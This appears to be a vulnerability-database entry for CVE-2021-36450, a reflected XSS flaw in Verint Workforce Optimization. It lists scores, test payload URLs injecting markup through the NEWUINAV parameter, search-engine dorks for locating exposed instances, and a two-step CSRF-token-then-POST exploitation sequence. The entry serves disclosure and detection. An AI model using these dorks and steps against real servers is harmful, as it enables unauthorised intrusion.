cbcvebase.
CVE-2021-36450
published 2021-12-15

CVE-2021-36450: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.

PriorityP357medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
68.86%
99.3th percentile
Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
verintworkforce_optimization

Detection & IOCsextracted from sources · hover to see the quote

url/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26
url/wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26
path/wfo/control/my_notifications
path/wfo/control/signin
  • Shodan/FOFA fingerprint for identifying exposed Verint WFO instances: search for login page title 'Verint Sign-in'.
  • FOFA query to identify Verint WFO instances: title="verint sign-in".
  • Google dork to identify Verint WFO instances: intitle:"verint sign-in".
  • The POST body to the signin endpoint includes browserCheckEnabled, username, and csrfp_login fields; the CSRF token is extracted via regex from the Set-Cookie header: csrfp_login=([a-zA-Z0-9]+);
  • CSRF token extraction regex from response header for chaining the two-step exploit: csrfp_login=([a-zA-Z0-9]+);
  • Content-Type for the POST exploitation request must be application/x-www-form-urlencoded.
  • ·Exploitation is a two-step process: first a GET to extract the csrfp_login CSRF token from the Set-Cookie header, then a POST to the signin endpoint with the token and the XSS payload embedded in the 'rd' redirect parameter targeting NEWUINAV.
  • ·The vulnerability is confirmed only on Verint Workforce Optimization version 15.2.8.10048; other versions are not confirmed vulnerable by the available sources.
  • ·Detection requires following up to 2 redirects after the POST request to observe the reflected XSS payload in the final response body.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.